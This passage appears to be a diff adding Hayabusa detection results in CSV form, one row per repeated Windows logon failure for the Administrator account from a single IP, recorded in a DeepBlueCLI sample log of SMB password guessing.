+2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iYtujXkzySwZQFk8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KE9v6wzrebvjvDIl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81gmRFFBHI1s4dqi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C8gHWPDjQM8M3tiQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: szj4mJvtFV06CuR2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ceGEl87hOM0InAAd | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XRv3C3rRxYXTgckj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TaPkJPIQnbL3VyUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LZ7PZAT6hWWHNc29 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJVD4uVhwfLSJ6Ab | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6KME1I6tE0v9UAq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 1Qtt1rk4n3tOJko2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: prPsA8EZHGfGPSHm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TQqGXnwHtB87LSzT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6uLT1bjaIS0XBsWC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PIgpraQTxFrcLphN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1D6qy57XImq4prx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Kw44Ffh4DIPlyuM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oKUdmKU74RmJysAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gZUTzZw0T1tYRSP5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nEOfjuAMa7HTsfcP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e7bG19emMTmyBQNm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YsLkgWukfqS3wWJK | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: liFcZjjpY3xXwe9j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vBUgbfzx2OEcOxWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iVCV0WoZmLTFNH71 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJmxGOqck4oQi1kL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w7lYqaUvEtTp18DK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: yZ9xQmGn61JJDeQS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XuMXpvY9fmLm0eBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ofesuNErTLWuN0k4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KsNq7SThd3b8oTwF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmRWg5gNRcxDMFjg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JXrGn6LehVwTGNNj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vIq9DS71jCjWbgdY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kw2BQbdUml0EPNOs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ugOqsKQFGmmLac3s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3rZHUbOUVBYiHarB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: otv8ByrbWWoTz7pi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HVlHkJu4Gxc9dhxM | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xKF5OCqLVVKvung0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: avAdpkOlP0xji1vG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VFgzMjEz6M0LBnX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kdJb0obVAqkY9GCw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ciSoQcLUgLfzaNg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: RECrGCCTJuDPlvYJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Z2w67uyC2NOgecT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRVetRdHvz0lJkOC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yXrtxquzyzxKnQgD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWOoEIEem7Q9Mdx0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86n5nIm04810NptD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M08noHtTqqx3pxSe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3P983pRVfCVlVTyA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eMKlcLvRhlx9FMcZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0gwEDgRF2wUgTDAy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I9Q2GSALfiuEbulo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DKTja76Qe9vSjrdN | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXXuUyKlvaOgMNSu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X3qdEQReXwHAZUS8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FqtfHJKOfmWXEd4s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mVv7vete3uXixggi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0PF6E3wRP0Tk39ss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: touwF4IXUahG7jvJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lMOi7rygc7SJ5TPQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QjM1K5eFSA9U37oE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HgzyZqFU9v2kDVvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hJeVj2h0sBxwBuGv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FNXI8b6Zcj1zU3JY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q9DyH9oxFbRTCQ80 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5LZo1ljGLOVKhwcC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GvY6Q7RGKwjehARC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uKLrHVMevqniTck8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldxglvKFhLJQ3FV3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRHIAxIj9wFRIg67 | IP Addr: 192.168.198.149 | AuthPackage: 
